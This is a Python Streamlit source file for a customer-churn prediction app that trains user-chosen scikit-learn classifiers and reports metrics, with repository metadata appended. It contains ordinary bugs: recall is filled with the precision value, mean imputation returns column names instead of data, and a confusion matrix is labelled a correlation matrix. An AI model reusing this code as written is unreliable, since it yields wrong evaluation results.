Tree\",\n \"Random Forest\",\n \"KnnClassifier\",\n \"Logistic Regression\",\n # \"SgdClassifier\",\n \"SVClassification\",\n ])\n if model == \"Decision Tree\":\n params = [\"criterion\", \"max_depth\", \"max_features\",\n \"min_samples_leaf\", \"min_samples_split\"]\n check_param = [st.sidebar.checkbox(\n param, key=param) for param in params]\n criterion, max_depth, max_features, min_samples_leaf, min_samples_split = \"gini\", None, None, 1, 2\n for p in range(len(params)):\n if check_param[p] and params[p] == \"criterion\":\n criterion = st.sidebar.selectbox(\n \"enter criterion value\",\n [\"gini\", \"entropy\"]\n )\n if check_param[p] and params[p] == \"max_depth\":\n max_depth = st.sidebar.selectbox(\n \"enter max_depth value\",\n [None, 2, 5, 10, 15]\n )\n if check_param[p] and params[p] == \"max_features\":\n max_features = st.sidebar.selectbox(\n \"enter max_features value\",\n [None, \"auto\", \"sqrt\", \"log2\"]\n )\n if check_param[p] and params[p] == \"min_samples_leaf\":\n min_samples_leaf = st.sidebar.selectbox(\n \"enter min_samples_leaf value\",\n [1, 5, 8, 12]\n )\n if check_param[p] and params[p] == \"min_samples_split\":\n min_samples_split = st.sidebar.selectbox(\n \"enter min_samples_split value\",\n [2, 3, 5, 8]\n )\n if st.sidebar.button(\"Predicting\"):\n dt = DecisionTreeClassifier(random_state=0, criterion=criterion, max_depth=max_depth,\n max_features=max_features, min_samples_leaf=min_samples_leaf, min_samples_split=min_samples_split)\n if not features:\n st.write(\"You have to choose some features for training\")\n elif good_target == False:\n st.write(\"Choose an appropriete target variable\")\n elif cat_encoder == False:\n st.error(\"You have to encode some variable\")\n else:\n predictions, predictions_p, accuracy, f_score, p, r, ras, accuracy_cv, y_test, X_test = core(\n data, features, target, dt, cv, length)\n data_t = view(data, target, length,\n predictions, predictions_p, y_test)\n tab = pd.DataFrame({\"accuracy\": [accuracy], \"f1_score\": [f_score],\n \"precision_score\": [p], \"recall_score\": [p],\n \"roc_auc_score\": [ras], \"accuracy_cross_validation\": [accuracy_cv]})\n tab.index = [\"\"] * len(tab)\n st.markdown(\"\"\"\n Differents metrics \n \"\"\",\n unsafe_allow_html=True)\n st.table(tab)\n\n st.markdown(\"\"\"\n Calcul of your retention and churn rate \n \"\"\",\n unsafe_allow_html=True)\n retention = (\n len(data_t.loc[data_t[\"predictions\"] == 0, \"predictions\"])/len(data_t))*100\n churn = (\n len(data_t.loc[data_t[\"predictions\"] == 1, \"predictions\"])/len(data_t))*100\n st.write(\"Retention rate: \"+str(retention)+\"%\")\n st.write(\"Churn rate: \"+str(churn)+\"%\")\n\n # st.sidebar.markdown(download_link(\n # data_t, \"result.csv\", \"Download predicting results\"), unsafe_allow_html=True)\n\n st.sidebar.markdown(download_link(\n pd.concat([X_test.drop(columns=target), data_t[\"predictions\"]], axis=1), \"result.csv\", \"Download predicting results\"), unsafe_allow_html=True)\n\n if model == \"Random Forest\":\n params = [\"n_estimators\", \"criterion\", \"max_depth\",\n \"max_features\", \"min_samples_leaf\", \"min_samples_split\"]\n check_param = [st.sidebar.checkbox(\n param, key=param) for param in params]\n n_estimators, criterion, max_depth, max_features, min_samples_leaf, min_samples_split = 100, \"gini\", None, None, 1, 2\n for p in range(len(params)):\n if check_param[p] and params[p] == \"n_estimators\":\n n_estimators = st.sidebar.selectbox(\n \"enter n_estimators value\",\n [100, 4, 6, 9]\n )\n if check_param[p] and params[p] == \"criterion\":\n criterion = st.sidebar.selectbox(\n \"enter criterion value\",\n [\"gini\", \"entropy\"]\n )\n if check_param[p] and params[p] == \"max_depth\":\n max_depth = st.sidebar.selectbox(\n \"enter max_depth value\",\n [None, 2, 5, 10, 15]\n )\n if check_param[p] and params[p] == \"max_features\":\n max_features = st.sidebar.selectbox(\n \"enter max_features value\",\n [None, \"auto\", \"sqrt\", \"log2\"]\n )\n if check_param[p] and params[p] == \"min_samples_leaf\":\n min_samples_leaf = st.sidebar.selectbox(\n \"enter min_samples_leaf value\",\n [1, 5, 8, 12]\n )\n if check_param[p] and params[p] == \"min_samples_split\":\n min_samples_split = st.sidebar.selectbox(\n \"enter min_samples_split value\",\n [2, 3, 5, 8]\n )\n if st.sidebar.button(\"Predicting\"):\n rf = RandomForestClassifier(random_state=0, n_estimators=n_estimators, criterion=criterion, max_depth=max_depth,\n max_features=max_features, min_samples_leaf=min_samples_leaf, min_samples_split=min_samples_split)\n if not features:\n st.write(\"You have to choose some features for training\")\n elif good_target == False:\n st.write(\"Choose an appropriete target variable\")\n elif cat_encoder == False:\n st.error(\"You have to encode some variable\")\n else:\n predictions, predictions_p, accuracy, f_score, p, r, ras, accuracy_cv, y_test, X_test = core(\n data, features, target, rf, cv, length)\n data_t = view(data, target, length,\n predictions, predictions_p, y_test)\n tab = pd.DataFrame({\"accuracy\": [accuracy], \"f1_score\": [f_score],\n \"precision_score\": [p], \"recall_score\": [p],\n \"roc_auc_score\": [ras], \"accuracy_cross_validation\": [accuracy_cv]})\n tab.index = [\"\"] * len(tab)\n st.markdown(\"\"\"\n Differents metrics \n \"\"\",\n unsafe_allow_html=True)\n\n st.table(tab)\n\n st.markdown(\"\"\"\n Calcul of your retention and churn rate \n \"\"\",\n unsafe_allow_html=True)\n retention = (\n len(data_t.loc[data_t[\"predictions\"] == 0, \"predictions\"])/len(data_t))*100\n churn = (\n len(data_t.loc[data_t[\"predictions\"] == 1, \"predictions\"])/len(data_t))*100\n st.write(\"Retention rate: \"+str(retention)+\"%\")\n st.write(\"Churn rate: \"+str(churn)+\"%\")\n\n # st.sidebar.markdown(download_link(\n # data_t, \"result.csv\", \"Download predicting results\"), unsafe_allow_html=True)\n\n st.sidebar.markdown(download_link(\n pd.concat([X_test.drop(columns=target), data_t[\"predictions\"]], axis=1), \"result.csv\", \"Download predicting results\"), unsafe_allow_html=True)\n\n if model == \"KnnClassifier\":\n params = [\"n_neighbors\", \"weights\", \"algorithm\"]\n check_param = [st.sidebar.checkbox(\n param, key=param) for param in params]\n n_neighbors, weights, algorithm = 5, \"uniform\", \"auto\"\n for p in range(len(params)):\n if check_param[p] and params[p] == \"n_neighbors\":\n n_neighbors = st.sidebar.selectbox(\n \"enter n_neighbors value\",\n [5, 10, 15, 20, 25]\n )\n if check_param[p] and params[p] == \"weights\":\n weights = st.sidebar.selectbox(\n \"enter weights value\",\n [\"uniform\", \"distance\"]\n )\n if check_param[p] and params[p] == \"algorithm\":\n algorithm = st.sidebar.selectbox(\n \"enter algorithm value\",\n [\"auto\", \"ball_tree\", \"kd_tree\", \"brute\"]\n )\n if st.sidebar.button(\"Predicting\"):\n knn = KNeighborsClassifier(\n n_neighbors=n_neighbors, weights=weights, algorithm=algorithm)\n if not features:\n st.write(\"You have to choose some features for training\")\n elif good_target == False:\n st.write(\"Choose an appropriete target variable\")\n elif cat_encoder == False:\n st.error(\"You have to encode some variable\")\n else:\n predictions, predictions_p, accuracy, f_score, p, r, ras, accuracy_cv, y_test, X_test = core(\n data, features, target, knn, cv, length)\n data_t = view(data, target, length,\n predictions, predictions_p, y_test)\n tab = pd.DataFrame({\"accuracy\": [accuracy], \"f1_score\": [f_score],\n \"precision_score\": [p], \"recall_score\": [p],\n \"roc_auc_score\": [ras], \"accuracy_cross_validation\": [accuracy_cv]})\n tab.index = [\"\"] * len(tab)\n st.markdown(\"\"\"\n Differents metrics \n \"\"\",\n unsafe_allow_html=True)\n\n st.table(tab)\n\n st.markdown(\"\"\"\n Calcul of your retention and churn rate \n \"\"\",\n unsafe_allow_html=True)\n retention = (\n len(data_t.loc[data_t[\"predictions\"] == 0, \"predictions\"])/len(data_t))*100\n churn = (\n len(data_t.loc[data_t[\"predictions\"] == 1, \"predictions\"])/len(data_t))*100\n st.write(\"Retention rate: \"+str(retention)+\"%\")\n st.write(\"Churn rate: \"+str(churn)+\"%\")\n\n # st.sidebar.markdown(download_link(\n # data_t, \"result.csv\", \"Download predicting results\"), unsafe_allow_html=True)\n\n st.sidebar.markdown(download_link(\n pd.concat([X_test.drop(columns=target), data_t[\"predictions\"]], axis=1), \"result.csv\", \"Download predicting results\"), unsafe_allow_html=True)\n\n if model == \"Logistic Regression\":\n params = [\"penalty\", \"solver\"]\n check_param = [st.sidebar.checkbox(\n param, key=param) for param in params]\n penalty, solver = \"l2\", \"lbfgs\"\n for p in range(len(params)):\n if check_param[p] and params[p] == \"penalty\":\n penalty = st.sidebar.selectbox(\n \"enter penalty value\",\n [\"l2\", \"l1\", \"elasticnet\", \"none\"]\n )\n if check_param[p] and params[p] == \"solver\":\n solver = st.sidebar.selectbox(\n \"enter solver value\",\n [\"lbfgs\", \"newton-cg\", \"liblinear\", \"sag\", \"saga\"]\n )\n try:\n if penalty == \"l1\" and solver in ['newton-cg', 'sag', 'lbfgs']:\n st.error(\"L1 don't work with \" + solver +\n \". But, it work well with 'liblinear' and 'saga' \")\n if penalty == 'elasticnet' and solver != 'saga':\n st.error(\"elasticnet don't work with \" +\n solver + \". But it work well with saga.\")\n else:\n\n if st.sidebar.button(\"Predicting\"):\n lr = LogisticRegression(\n random_state=0, penalty=penalty, solver=solver)\n if not features:\n st.write(\n \"You have to choose some features for training\")\n elif good_target == False:\n st.write(\"Choose an appropriete target variable\")\n elif cat_encoder == False:\n st.error(\"You have to encode some variable\")\n else:\n predictions, predictions_p, accuracy, f_score, p, r, ras, accuracy_cv, y_test, X_test = core(\n data, features, target, lr, cv, length)\n data_t = view(data, target, length,\n predictions, predictions_p, y_test)\n tab = pd.DataFrame({\"accuracy\": [accuracy], \"f1_score\": [f_score],\n \"precision_score\": [p], \"recall_score\": [p],\n \"roc_auc_score\": [ras], \"accuracy_cross_validation\": [accuracy_cv]})\n tab.index = [\"\"] * len(tab)\n st.markdown(\"\"\"\n Differents metrics \n \"\"\",\n unsafe_allow_html=True)\n\n st.table(tab)\n\n st.markdown(\"\"\"\n Calcul of your retention and churn rate \n \"\"\",\n unsafe_allow_html=True)\n retention = (\n len(data_t.loc[data_t[\"predictions\"] == 0, \"predictions\"])/len(data_t))*100\n churn = (\n len(data_t.loc[data_t[\"predictions\"] == 1, \"predictions\"])/len(data_t))*100\n st.write(\"Retention rate: \"+str(retention)+\"%\")\n st.write(\"Churn rate: \"+str(churn)+\"%\")\n # st.sidebar.markdown(download_link(\n # data_t, \"result.csv\", \"Download predicting results\"), unsafe_allow_html=True)\n\n st.sidebar.markdown(download_link(pd.concat([X_test.drop(\n columns=target), data_t[\"predictions\"]], axis=1), \"result.csv\", \"Download predicting results\"), unsafe_allow_html=True)\n\n except:\n st.warning(\"Choose another solver or another penalty\")\n\n if model == \"SVClassification\":\n params = [\"kernel\", \"degree\"]\n check_param = [st.sidebar.checkbox(\n param, key=param) for param in params]\n kernel, degree = \"rbf\", 3\n for p in range(len(params)):\n if check_param[p] and params[p] == \"kernel\":\n kernel = st.sidebar.selectbox(\n \"enter kernel value\",\n [\"rbf\", \"poly\", \"sigmoid\", \"precomputed\"]\n )\n if check_param[p] and params[p] == \"degree\":\n degree = st.sidebar.selectbox(\n \"enter degree value\",\n [3, 6, 9]\n )\n if st.sidebar.button(\"Predicting\"):\n sv = SVC(random_state=0, kernel=kernel,\n degree=degree, probability=True)\n if not features:\n st.write(\"You have to choose some features for training\")\n elif good_target == False:\n st.write(\"Choose an appropriete target variable\")\n elif cat_encoder == False:\n st.error(\"You have to encode some variable\")\n else:\n predictions, predictions_p, accuracy, f_score, p, r, ras, accuracy_cv, y_test, X_test = core(\n data, features, target, sv, cv, length)\n data_t = view(data, target, length,\n predictions, predictions_p, y_test)\n tab = pd.DataFrame({\"accuracy\": [accuracy], \"f1_score\": [f_score],\n \"precision_score\": [p], \"recall_score\": [p],\n \"roc_auc_score\": [ras], \"accuracy_cross_validation\": [accuracy_cv]})\n tab.index = [\"\"] * len(tab)\n st.markdown(\"\"\"\n Differents metrics \n \"\"\",\n unsafe_allow_html=True)\n\n st.table(tab)\n\n st.markdown(\"\"\"\n Calcul of your retention and churn rate \n \"\"\",\n unsafe_allow_html=True)\n retention = (\n len(data_t.loc[data_t[\"predictions\"] == 0, \"predictions\"])/len(data_t))*100\n churn = (\n len(data_t.loc[data_t[\"predictions\"] == 1, \"predictions\"])/len(data_t))*100\n st.write(\"Retention rate: \"+str(retention)+\"%\")\n st.write(\"Churn rate: \"+str(churn)+\"%\")\n\n st.sidebar.markdown(download_link(\n pd.concat([X_test.drop(columns=target), data_t[\"predictions\"]], axis=1), \"result.csv\", \"Download predicting results\"), unsafe_allow_html=True)\n\n\ndef deal_with_NaN(data, choice, col_with_NaN):\n if choice == \"Dropna\":\n data = data.dropna(axis=0)\n st.write(data.isna().sum())\n return data\n\n if choice == \"Replace by Mean\":\n imputer = SimpleImputer(strategy='mean')\n Imputed_data = pd.DataFrame(imputer.fit_transform(data))\n Imputed_data = data.columns\n return Imputed_data\n\n if choice == \"Drop Columns with NaN\":\n return data.drop(columns=col_with_NaN)\n\n\ndef preprocessing(data, target):\n X = data.drop(target, axis=1)\n y = data[target]\n\n return X, y\n\n\ndef evaluation(model, X_train, y_train, X_test, y_test, cv):\n model.fit(X_train, y_train)\n ypred = model.predict(X_test)\n st.write(\"Correlation Matrix\")\n st.write(confusion_matrix(y_test, ypred))\n\n N, train_scores, test_scores = learning_curve(model, X_train, y_train, train_sizes=np.linspace(0.1, 1, 10),\n cv=10)\n\n fig = plt.subplots()\n fig = plt.figure(figsize=(12, 8))\n ax = plt.plot(N, train_scores.mean(axis=1), label='train score')\n ax = plt.plot(N, test_scores.mean(axis=1), label='test score')\n ax = plt.title(\n \"Learning curve for accuracy: This show us if the model overfit\")\n plt.legend()\n st.pyplot(fig)\n\n return model\n\n\ndef main():\n \"\"\"Common Machine Learning EDA\"\"\"\n\n main_content()\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "badou11/streamlit_for_churn", "sub_path": "churnapp.py", "file_name": "churnapp.py", "file_ext": "py", "file_size_in_byte": 36529, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.use", "line_number": 30, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 37, "usage_type": "call"}, {"api_name": "streamlit.cache", "line_number": 35, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 53, "usage_type": "attribute"}, {"api_name": "base64.b64encode", "line_number": 57, "usage_type": "call"}, {"api_name": "plotly.express.scatter", "line_number": 66, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 66, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 70, "usage_type": "call"}, {"api_name": "streamlit.sidebar.error", "line_number": 72, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 72, "usage_type": "attribute"}, {"api_name": "plotly.express.bar", "line_number": 76, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 76, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 78, "usage_type": "call"}, {"api_name": "streamlit.sidebar.error", "line_number": 80, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 80, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "seaborn.countplot", "line_number": 85, "usage_type": "call"}, {"api_name": "streamlit.pyplot", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "seaborn.heatmap", "line_number": 89, "usage_type": "call"}, {"api_name": "pandas.crosstab", "line_number": 89, "usage_type": "call"}, {"api_name": "streamlit.pyplot", "line_number": 91, "usage_type": "call"}, {"api_name": "plotly.express.box", "line_number": 95, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 95, "usage_type": "name"}, {"api_name": "plotly.express.box", "line_number": 97, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 97, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 100, "usage_type": "call"}, {"api_name": "plotly.express.histogram", "line_number": 103, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 103, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 106, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 110, "usage_type": "call"}, {"api_name": "streamlit.text", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 130, "usage_type": "name"}, {"api_name": "streamlit.pyplot", "line_number": 131, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 133, "usage_type": "call"}, {"api_name": "streamlit.text", "line_number": 136, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 139, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 139, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 140, "usage_type": "name"}, {"api_name": "seaborn.distplot", "line_number": 141, "usage_type": "call"}, {"api_name": "seaborn.distplot", "line_number": 143, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 145, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 145, "usage_type": "name"}, {"api_name": "streamlit.pyplot", "line_number": 146, "usage_type": "call"}, {"api_name": "streamlit.text", "line_number": 150, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 151, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 152, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Figure", "line_number": 154, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 154, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Pie", "line_number": 155, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 155, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 158, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 167, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 178, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 179, "usage_type": "call"}, {"api_name": "sklearn.metrics.precision_score", "line_number": 180, "usage_type": "call"}, {"api_name": "sklearn.metrics.recall_score", "line_number": 181, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 182, "usage_type": "call"}, {"api_name": "sklearn.model_selection.cross_validate", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 186, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 191, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 194, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 195, "usage_type": "call"}, {"api_name": "plotly.express.bar", "line_number": 204, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 204, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 208, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 213, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 217, "usage_type": "call"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 222, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 222, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.file_uploader", "line_number": 228, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 228, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.write", "line_number": 232, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 232, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.slider", "line_number": 234, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 234, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.write", "line_number": 238, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 238, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 239, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 239, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.button", "line_number": 244, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 244, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.button", "line_number": 247, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 247, "usage_type": "attribute"}, {"api_name": "streamlit.write", "line_number": 248, "usage_type": "call"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 250, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 250, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.warning", "line_number": 253, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 253, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.write", "line_number": 256, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 256, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.write", "line_number": 257, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 257, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.text_input", "line_number": 259, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 259, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.text_input", "line_number": 261, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 261, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.button", "line_number": 263, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 263, "usage_type": "attribute"}, {"api_name": "streamlit.write", "line_number": 266, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 274, "usage_type": "call"}, {"api_name": "streamlit.sidebar.info", "line_number": 277, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 277, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 281, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 281, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 285, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 285, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.number_input", "line_number": 288, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 288, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 289, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 289, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 293, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 293, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.multiselect", "line_number": 297, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 297, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.button", "line_number": 300, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 300, "usage_type": "attribute"}, {"api_name": "streamlit.success", "line_number": 301, "usage_type": "call"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 306, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 306, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.multiselect", "line_number": 327, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 327, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.warning", "line_number": 339, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 339, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.write", "line_number": 342, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 342, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 343, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 343, "usage_type": "attribute"}, {"api_name": "pandas.get_dummies", "line_number": 348, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 350, "usage_type": "call"}, {"api_name": "streamlit.sidebar.write", "line_number": 353, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 353, "usage_type": "attribute"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 356, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 360, "usage_type": "call"}, {"api_name": "streamlit.sidebar.write", "line_number": 362, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 362, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.warning", "line_number": 364, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 364, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 368, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 368, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.slider", "line_number": 372, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 372, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 375, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 375, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 379, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 379, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.checkbox", "line_number": 391, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 391, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 396, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 396, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 401, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 401, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 406, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 406, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 411, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 411, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 416, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 416, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.button", "line_number": 420, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 420, "usage_type": "attribute"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 421, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 424, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 426, "usage_type": "call"}, {"api_name": "streamlit.error", "line_number": 428, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 434, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 438, "usage_type": "call"}, {"api_name": "streamlit.table", "line_number": 442, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 444, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 452, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 453, "usage_type": "call"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 458, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 458, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 459, "usage_type": "call"}, {"api_name": "streamlit.sidebar.checkbox", "line_number": 464, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 464, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 469, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 469, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 474, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 474, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 479, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 479, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 484, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 484, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 489, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 489, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 494, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 494, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.button", "line_number": 498, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 498, "usage_type": "attribute"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 499, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 502, 